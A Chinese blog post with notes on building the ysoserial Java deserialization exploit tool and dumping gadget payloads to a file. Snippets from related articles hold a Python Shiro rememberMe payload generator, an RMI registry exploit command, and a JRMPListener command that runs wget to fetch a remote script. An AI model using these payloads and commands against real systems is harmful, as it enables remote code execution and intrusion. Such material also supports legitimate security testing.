ysoserial笔记

最新推荐文章于 2024-06-20 16:30:00 发布
最新推荐文章于 2024-06-20 16:30:00 发布
阅读量5.2k 收藏 9
点赞数 4
分类专栏: Web java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/83276779
版权
Web 同时被 2 个专栏收录
220 篇文章 7 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

项目主页:
https://github.com/frohoff/ysoserial
可以在这里:https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
下载最新版本,也可以自己编译。

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

在这里插入图片描述

同样方法也适用于marshalsec

在这里插入图片描述

使用IDEA用maven编译

在IDEA图形界面中执行以下命令:

mvn clean package -DskipTests

在这里插入图片描述

输出以下结果说明编译成功:
在这里插入图片描述

gadget测试

找到具体的payload,直接运行其main方法即可:
在这里插入图片描述
如果想拿到包含序列化对象的payload,可以在
PayloadRunner.run方法中插入自己的代码:

// 测试
                (new FileOutputStream("Spring1Payload.class")).write(ser);

在这里插入图片描述
而且可以自定义自己的command。

caiqiiqi
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ysoserial.jar
06-01
shrio反序裂化利用工具,JAVA反序裂化利用工具。 https://github.com/frohoff/ysoserial 源码编辑而来。 def generator(command, fp,key): if not os.path.exists(fp): print('Jar zai na ne ?') raise Exception('jar file not found!') popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext 代码中需要的jar包
ysoserial-0.0.6-SNAPSHOT-all.jar
12-19
ysoserial-0.0.6 也可自行下载编译 提供个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
ysoserial 编译成eclipse 项目
把梦想放飞在蓝色的天空里...
11-23 353
1. ysoserial 编译成eclipse项目: mvn eclipse:clean mvn eclipse:eclipse 再用eclipse打开项目。
基于ysoserial的深度利用研究(命令回显与内存马)
最新发布
2401_84488651的博客
06-20 901
很多小伙伴做反序列化漏洞的研究都是以命令执行为目标,本地测试最喜欢的就是弹计算器,但没有对反序列化漏洞进行深入研究,例如如何回显命令执行的结果,如何加载内存马。遇到了一个实际环境中的反序列化漏洞,也通过调试最终成功执行命令,达到了RCE的效果。在实际的攻防场景下,能执行命令并不是最完美的利用场景,内存马才是最终的目标。本篇文章就在此基础上讲一讲如何进行命令回显和加载内存马。
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
ysoserial-0.0.4-all.jar
09-17
ysoserial-0.0.4-all.jar系统自动生成分数,我也改不了,分数不够的可以联系我私发。
java超强笔记
12-03
"Java超强笔记"正是一份专为新手准备的学习资源,它全面涵盖了从Java环境的搭建到软件设计的各种概念,旨在提供一个易读且系统的学习路径。 首先,笔记可能会从Java的起源和发展开始介绍,让你了解这门语言的历史...
1635491168笔记
11-28
Linux笔记
mybatis相关笔记
05-20
mybatis相关笔记
C++学习笔记
05-14
C++学习笔记C++学习笔记C++学习笔记C++学习笔记C++学习笔记
华为学习笔记
03-28
华为学习笔记
ysoserial-0.0.5-all.jar
08-27
ysoserial-0.0.5-all.jar反序列化漏洞利用,jar可以直接使用
ysoserial-0.0.2
12-25
weblogic反序列化漏洞 测试用的 有需要的同学拿去用
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
ysoserial下载和使用
c0529的博客
05-22 480
因为要用java打开jar格式的,所以如果下的是源文件,还需要打包,我试了试,我这个报错了,我也不知道哪里有问题。如果不报错可以自己试试打包的工作,说不定以后还有用到。所以我的建议是直接下载jar版本的。然后直接用java去运行就可以了。网址拖到下面就可以直接下载。
ysoserial的代码学习
问题很多的小明
08-29 643
反序列化漏洞利用神器:ysoserial 0x01ysoserial 工具模块 我们以为shiro远程加载反序列化数据的利用场景为例: java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'wget http://xxx.xxx.xxx.xxx:8080/1.sh -O test' 其中-cp指定了类路径为: ysoserial.exploit.
ysoserial 动态调试
sojrs_sec的博客
12-24 1515
前言 在尝试对cve-2018-2628反序列化漏洞做分析的时候,发现一个比较重要的概念是JRMP,而在ysoserial中已经实现了JRMP的客户端和服务端,所以想可以直接进行动态调试一下,大概了解下JRMP的机制,下面简单讲一下ysoserial的调试方法 调试步骤: Cve-2018-2628需要开启JRMPListener以及JRMPClient,这里我以调试JRMPClient为例,参照...
【转载】ysoserial反序列化工具打包jar文件流程
mingyqf的博客
03-30 1870
ysoserial反序列化工具打包jar文件流程 [Fighter安全团队](javascript:void(0)😉 2021-01-31 22:28 00 — *前言* 身边很多朋友都不懂怎么将源码项目打包成jar文件,那么接着上一篇的环境就简单讲讲jar的打包流程,毕竟在github上有些项目都不是打包好的。这里以ysoserial为例,项目下载地址:https://codeload.github.com/frohoff/ysoserial/zip/master 01 — *idea打包jar * 导入
【JAVA反序列扫描工具】简介、下载、安装、使用
04-22 5080
【反序列扫描工具】
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值